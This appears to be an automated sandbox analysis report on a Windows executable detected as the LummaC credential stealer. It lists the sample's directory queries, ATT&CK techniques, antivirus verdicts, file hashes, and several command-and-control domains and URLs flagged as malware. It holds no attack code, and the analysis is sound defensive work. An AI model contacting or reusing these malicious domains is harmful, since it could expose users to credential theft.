Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\JDDHMPCDUJ	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\QFAPOWPAFG	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\LHEPQPGEWF	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\nayfObR.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: C:\Users\user\Desktop\nayfObR.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	241 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	21 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nayfObR.exe	44%	Virustotal		Browse
nayfObR.exe	39%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fancywaxxers.shop/$	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apirV	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/Ek	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/Jk	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apink	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiR3oR	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/i	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apiMicrosoft	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/apis	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiok	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/ak	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api7	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiJ	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/api9	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.32.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
fancywaxxers.shop	false	high
rabidcowse.shop	false	high
wholersorie.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apirV	nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/$	nayfObR.exe, 00000003.00000003.2064676852.000000000592D000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2064576733.0000000005928000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop:443/apiMicrosoft	nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/Ek	nayfObR.exe, 00000003.00000003.2051055223.00000000030BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apis	nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/Jk	nayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api	nayfObR.exe, nayfObR.exe, 00000003.00000003.2223148388.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210391409.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apink	nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/apiR3oR	nayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/i	nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiok	nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/I	nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micro	nayfObR.exe, 00000003.00000003.2101907540.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210129135.0000000003111000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.0000000003103000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiJ	nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/ak	nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/	nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183510952.000000000311D000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030AC000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.000000000311E000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.000000000593D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api7	nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api9	nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583755
Start date and time:	2025-01-03 14:33:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nayfObR.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.253.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target nayfObR.exe, PID 6540 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:33:56	API Interceptor	8x Sleep call for process: nayfObR.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://www.klim.com	Get hash	malicious	Unknown	Browse	104.18.27.193
	XClient.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	104.26.13.205
	mode11_0HVJ.exe	Get hash	malicious	CobaltStrike	Browse	188.114.96.3
	https://goatstuff.sbs/re5.mp4	Get hash	malicious	Unknown	Browse	188.114.96.3
	mode11_AKUh.exe	Get hash	malicious	CobaltStrike	Browse	188.114.96.3
	mode11_qLf2.exe	Get hash	malicious	CobaltStrike	Browse	188.114.97.3
	mode11_UVo6.exe	Get hash	malicious	CobaltStrike	Browse	188.114.96.3
	mode11_buqd.exe	Get hash	malicious	CobaltStrike	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.32.1
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	file.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	file.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	104.21.32.1
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	104.21.32.1
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	104.21.32.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.662111974378329
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nayfObR.exe
File size:	535'040 bytes
MD5:	138fcf999a87419be2c7e5e036601466
SHA1:	7569a1444cd948145c966dbe0b47ffdb587f8681
SHA256:	960aa535a9712242c02a82c1f07530ae60e79bcbab15fcf0ebc6e7dbd636710b
SHA512:	afd574b7cf69012e1fd319c6e3825ff512c042c9917f5d7087ea88632516c9ab6bb30d48d465e18ba1be6e412a9ac728d609006af05df8577d7de2c938501c6d
SSDEEP:	12288:DztE0u86qlmk/345zA7Fv6vsVOzm9t/Gzr9AskP6f:DO0uYlmsozAAvsYkGzrOw
TLSH:	F0B4E05175C0C072D8A3253259F5CB759A2EF9200F626DCFA7880FBA8F216D15B31B6E
